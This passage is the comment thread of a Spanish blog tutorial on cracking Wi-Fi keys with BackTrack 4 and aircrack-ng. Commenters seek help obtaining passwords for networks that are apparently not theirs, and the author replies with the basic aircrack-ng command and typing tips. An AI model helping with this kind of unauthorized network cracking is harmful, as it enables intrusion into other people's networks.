    Sigo tratando de que me funcione el wifi
    Saludos

  81. saves tengo backtrack 4 en hp pavilion dv4 notebook, y no arrnca en mi pc ojala que me puedan a lludar con el problena xfa

  82. [...] fuente [...]

  83. BUenas Te pido por favor que me ayudes, ya stoy cansado de dar vueltas por internet y preguntar por todos lados sin ninguna respuesta…. mi problema es que la red, la cual quiero averiguar la clave, tiene ENC (encriptacion) OPN como en las imágenes de tu post y no puedo conseguir los paquetes… como se procede en este caso?? MUCHISIMAS GRACIAS!!!

  84. El BT4 desde DVD ha corrido muy bien, y tengo descargados mas de 45000 pakets, pero al introducir el comando aircrack-ng me dice “aircrack-ng: invalid option –” y ya no se como continuar.
    Alguien puede ayudarme?

  85. BACKTRACK ESTA MUY BUENO PERO, INGRESO AIRMON-NG Y NO ME MUESTRA NINGUNA INTERFACE, QUE ESTARA PASANDO? COMO PODEMOS CAMBIAR BACKTRACK EN ESPAÑOL, AGARDEZCO ME AYUDEN.

  86. necesito e me puedes contestar porfa?urgente me contestes
    ya tengo la clave pero al meterla se conecta por unos segundos y despues se desconecta ya hice todo vien pues ya tengo la clav

  87. hola ,ojala me alegres el dia amigo,con el bactrack 4 con lass wep no tengo problema pero si para las wpa2, lo hago todo bien pero al final cuando uso el aircrack-ng + la ruta del diccionario me quedo atracado, tengo el diccionario que pesa como 2GB pero talvez deba tenerlo en el escritorio del bactrack4 ¿COMO LOGRO ESO? o dime cual es el comando correcto a usar para obtener la clave wpa2..gracias

  88. hola de nuevo, el diccionario que tengo dentro del bactrack esta como word.lst es ese el correcto no lo se porfavor ayudame,,gracias.

    • Primero debemos saber como se llama el fichero donde se ha almacenado, para ello en la terminal, escirbimos:

      “dir” y copiamos el nombre del fichero .cap

      Una vez realizado esto pasamos al último paso:

      “aircrack-ng wep-01.cap”

  89. Hola!

    Gracias por el tuto. Todo perfecto salvo que me sale una contraseña WEP en hex tal que así: [69:86:98:69:86] y no se puede pasar a ASCII porque son valores fuera del rango hexadecimal.. ¿Que puede estar pasando?

  90. Hola daniskate

    Necesito ayuda con la escritura de algunos caracteres para usarlos en back track
    lo que pasa es que cuando quiero escribir “:” no me aparece el caracter debido, para poder continuar con el crackeo, no se a que se deba lo mismo puedo decir cuando quiero usar los demás caracteres ¬¬ , pero el problema es que necesito usar los dos puntos y no los puedo escribir he intentado con varias combinaciones de teclas y nada. Estoy usando BackTRack 4 desde mi unidad de CD/DVD, no se si existan comandos con ayuda para el teclado que eso es lo único que me interesa, ya que también te iba a preguntar sobre la consola pero creo que esa sólo la puedo obtener sólo si instalo BackTRack en el disco duro. Espero puedas ayudarme con éste insignificante problema. Gracias.Saludos

    • El problema ese, lo puedes solventar seleccionando los dos puntos “:” con el raton y pegando o marcandolo desde el codigo ASCII con la tecla Alt,
      la combinación es Alt + 58.
      Gracias a ti, Saludos

  91. muchas gracias de verdad me ha sevido un monton te lo mereses tio, te ha costado trabajo y esfuerzo en acer esto y te lo agradesco.por haberme despejado muchas dudas. gracias y suerte

  92. bien tio bien

  93. Muy buen aporte, a mi si me funciono, gracias daniskate

Deja un comentario

Fill in your details below or click an icon to log in:

Logo de WordPress.com

You are commenting using your WordPress.com account. Log Out / Cambiar )

Twitter picture

You are commenting using your Twitter account. Log Out / Cambiar )

Facebook photo

You are commenting using your Facebook account. Log Out / Cambiar )

Connecting to %s

 
Seguir

Get every new post delivered to your Inbox.